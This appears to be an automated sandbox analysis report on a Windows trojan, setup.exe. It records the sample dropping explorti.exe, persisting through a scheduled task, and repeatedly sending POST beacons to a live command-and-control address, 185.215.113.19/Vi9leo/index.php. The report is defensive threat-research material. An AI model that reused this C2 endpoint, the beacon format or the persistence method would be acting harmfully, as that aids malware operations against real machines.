                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Source: Joe Sandbox ViewIP Address: 185.215.113.19 185.215.113.19
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002BBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,10_2_002BBD60
                    Source: unknownHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: explorti.exe, 0000000A.00000002.3368400813.0000000001719000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.0000000001756000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php
                    Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php8
                    Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC
                    Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpN
                    Source: explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpa
                    Source: explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
                    Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpo
                    Source: explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpr
                    Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpt

                    System Summary

                    barindex
                    Source: setup.exeStatic PE information: section name:
                    Source: setup.exeStatic PE information: section name: .idata
                    Source: setup.exeStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002F306810_2_002F3068
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002BE44010_2_002BE440
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002B4CF010_2_002B4CF0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002E7D8310_2_002E7D83
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002F765B10_2_002F765B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002B4AF010_2_002B4AF0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002F872010_2_002F8720
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002F6F0910_2_002F6F09
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002F777B10_2_002F777B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002F2BD010_2_002F2BD0
                    Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: setup.exeStatic PE information: Section: ZLIB complexity 0.9998719262295082
                    Source: setup.exeStatic PE information: Section: rylhmesc ZLIB complexity 0.9945997846699479
                    Source: explorti.exe.0.drStatic PE information: Section: ZLIB complexity 0.9998719262295082
                    Source: explorti.exe.0.drStatic PE information: Section: rylhmesc ZLIB complexity 0.9945997846699479
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7Jump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: setup.exeReversingLabs: Detection: 62%
                    Source: setup.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: apphelp.dllJump to behavior
